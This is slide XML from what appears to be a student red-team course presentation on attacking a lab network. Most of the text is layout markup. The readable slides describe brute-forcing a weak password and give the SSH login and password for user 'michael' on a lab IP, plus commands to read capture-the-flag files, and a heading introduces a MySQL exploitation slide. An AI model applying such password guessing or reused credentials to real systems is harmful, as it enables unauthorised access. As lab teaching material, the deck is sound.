          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Google Shape;44;p9"/>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830984" y="11281533"/>
            <a:ext cx="15992700" cy="1613700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Google Shape;47;p10"/>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0984" y="1186733"/>
            <a:ext cx="22715700" cy="1527300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>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a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="3073267"/>
            <a:ext cx="22715700" cy="9110400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buChar char="●"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;12;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22587337" y="12435245"/>
            <a:ext cx="1462800" cy="1049700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:norm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gif"/><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192.168.1.115"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18250" y="-105925"/>
            <a:ext cx="24395899" cy="13827051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32801" y="13111075"/>
            <a:ext cx="244461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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red Team final project presentation: Rami, Katerina, Lobna, Jeremy, Javier, Jennifer</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6645750" y="3585000"/>
            <a:ext cx="11067900" cy="190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9800" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Final Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="9800" b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-23850" y="5791200"/>
            <a:ext cx="24396000" cy="3196500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6831300" y="5950800"/>
            <a:ext cx="10696800" cy="2628000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="85725" dist="133350" dir="1740000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="69000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Attack, Defense &amp; Analysis of a Vulnerable Network</a:t>
            </a:r>
            <a:endParaRPr sz="64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2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Exploitation of Weak User Password </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Google Shape;206;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10</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="207" name="Google Shape;207;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2832912" y="10050200"/>
            <a:ext cx="8205726" cy="3012625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="314325" dist="38100" dir="720000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="19383000" cy="33465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0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did we exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Small manual Brute-Force Attack to guess Michael’s password.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It allowed us to SSH into Michael and find &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/www/html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> directory next to the html folder.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2832888" y="5772650"/>
            <a:ext cx="8205600" cy="3775800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 62500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="242888" dist="47625" dir="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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands for &lt;flag1&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2600" b="1">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ssh michael@192.168.1.110</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pw: michael</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cd ../../</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cd var/www/html </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ls -l</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nano service.html</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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;flag1&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12827701" y="5772700"/>
            <a:ext cx="9356400" cy="3775800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 62500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F7EF6A"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="242888" dist="47625" dir="84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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands for &lt;flag2&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="260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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ssh michael@192.168.1.110</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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>pw: michael</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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cd../../</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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cd var/www</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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ls -l</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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cat flag2.txt </a:t>
            </a:r>
            <a:endParaRPr sz="26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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;flag2&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="211" name="Google Shape;211;p27"/>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2827700" y="10050200"/>
            <a:ext cx="9356451" cy="3012625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="314325" dist="38100" dir="72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9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="210"/>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11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="10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Exploitation of MySQL Database </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;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11</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="218" name="Google Shape;218;p2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669800" y="10712851"/>
            <a:ext cx="10213846" cy="2125350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="228600" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219" name="Google Shape;219;p2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5242650" y="1807900"/>
            <a:ext cx="8337525" cy="8001700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="228600" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="14324700" cy="45744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0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did we exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
